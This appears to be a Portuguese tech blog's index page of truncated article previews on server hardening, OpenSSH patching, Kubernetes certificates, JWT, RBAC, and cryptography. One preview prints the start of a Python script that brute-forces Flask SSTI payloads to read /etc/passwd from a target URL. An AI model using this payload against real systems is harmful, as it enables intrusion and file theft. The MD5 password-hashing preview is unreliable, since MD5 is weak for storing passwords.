Otimização de Servidores: Ajustes Essenciais para o Tomcat
Altere a porta de gerenciamento Telnet (8005) e o comando de shutdown, pois são considerados pontos de acesso perigosos.
Modifique a porta padrão do AJP (8009) para um valor maior que 1024, evitando conflitos com portas de sistema.
Restrinja o acesso à porta AJP usando regras de fireawll (iptables), permitindo conexões apenas de servidores de ...
Publicado em 9-21 23:25
Guia Completo para Atualização do OpenSSH para a Versão 9.8p1
Recentemente, devido a uma reforma de segurança, muitos clientes enfrentaram o problema do CVE-2024-6387, um vulnerabilidade de execução remota no servidor OpenSSH. Outros profissionais também têm trabalhado na correção dessa falha. Durante o processo, encontrei dificuldades com o uso do SFTP após a atualização, e compilei este guia passo a pas ...
Publicado em 8-27 22:53
Configuração de Certificados CA para Kubernetes em Instalação Binária
Preparação das Ferrametnas de Criptografia
Para iniciar a infraestrutura de segurança, é necessário instalar o conjunto de utilitários cfssl em um dos nós de controle. Este processo cria os binários necessários para gerar e gerenciar certificados TLS.
[root@control-plane ~]# mkdir -p /opt/kubernetes/bin
[root@control-plane ~]# export CFSSL_URL= ...
Publicado em 8-21 12:22
Introdução aos Princípios de Autenticação JWT
Índice- Características da autenticação tradicional
Características da autenticação JWT
Anatomia do token JWT
Fluxo de operação do JWT
Considerações de segurança
O JSON Web Token (JWT) é um padrão aberto (RFC 7519) que define uma forma compacta e autocontida para transmitir informações entre partes de forma segura através de objetos JSON. Ess ...
Publicado em 8-6 17:29
Injeção de SSTI em aplicações Flask e como contornar
Exploração da classe FileLoader:
import requests
url = input('Digite a URL do alvo: ')
for i in range(500):
payload = f"{{{{''.__class__.__bases__[0].__subclasses__()[{i}].get_data(0, '/etc/passwd')}}}}"
try:
response = requests.post(url, data={"name": payload})
if response.status_code == 200 and '_fr ...
Publicado em 8-5 12:37
Implementando um Sistema de Controle de Acesso Baseado em Papéis (RBAC) Flexível
O modelo RBAC (Role-Based Access Control) é uma abordagem amplamente utilizada em sistemas corporativos para gerenciar permissões de forma flexível.
O Que é RBAC?
RBAC se baseia na ideia de associar permissões a papéis, e não diretamente a usuários. A hierarquia é:
Usuário → Papel → Permissão
Em vez de atribuir permissões individuais a cada usu ...
Publicado em 7-27 06:21
Implementando Criptografia AES com Go
O AES (Advanced Encryption Standard) representa um algoritmo de criptografia simétrica amplamente utilizado para proteger informações sensíveis. A linguagem Go oferece suporte nativo a essa funcionalidade através do pacote crypto/aes, que geralmente é utilizado em conjunto com o pacote crypto/cipher.
Criação da Chave de Criptografia
Para o algo ...
Publicado em 7-19 01:00
Sistemas de Códigos de Resgate: Implementação Técnica e Mecanismos de Segurança para Promoções Digitais
Sistemas de códigos promocionais, como os empregados em ofertas de serviços digitais, demandam uma arquitetura robusta que integra geração segura, validação confiável e proteção contra abusos. Este artigo explora os componentes técnicos essenciais para construir tal sistema, focando em aspectos como geração de códigos, lógica de validação no se ...
Publicado em 7-13 04:56
Protegendo Dados Sensíveis com MD5 e Salting
A segurança no armazenamento de dados, especialmente senhas, é crucial. Uma abordagem comum para mitigar riscos é a aplicação de algoritmos de hash, como o MD5, antes de persistir essas informações. O MD5, embora tenha suas limitações de segurança reconhecidas, ainda pode servir como uma introdução ao conceito de hashing.
O que é MD5?
MD5 (Mess ...
Publicado em 7-11 02:35
Análise Profunda do IDM Activation Script: Mecanismos de Bloqueio do Registro
Este artigo explora os princípios por trás da tecnologia de bloqueio de registro utilizada pelo IDM Activation Script. Detalhamos os mecanismos de defesa multicamadas baseados no modelo de segurança do Windows, cobrindo componentes essenciais como identificação de SID, escalonamento de privilégios, controle de ACL e transferência de propriedade ...
Publicado em 7-8 07:27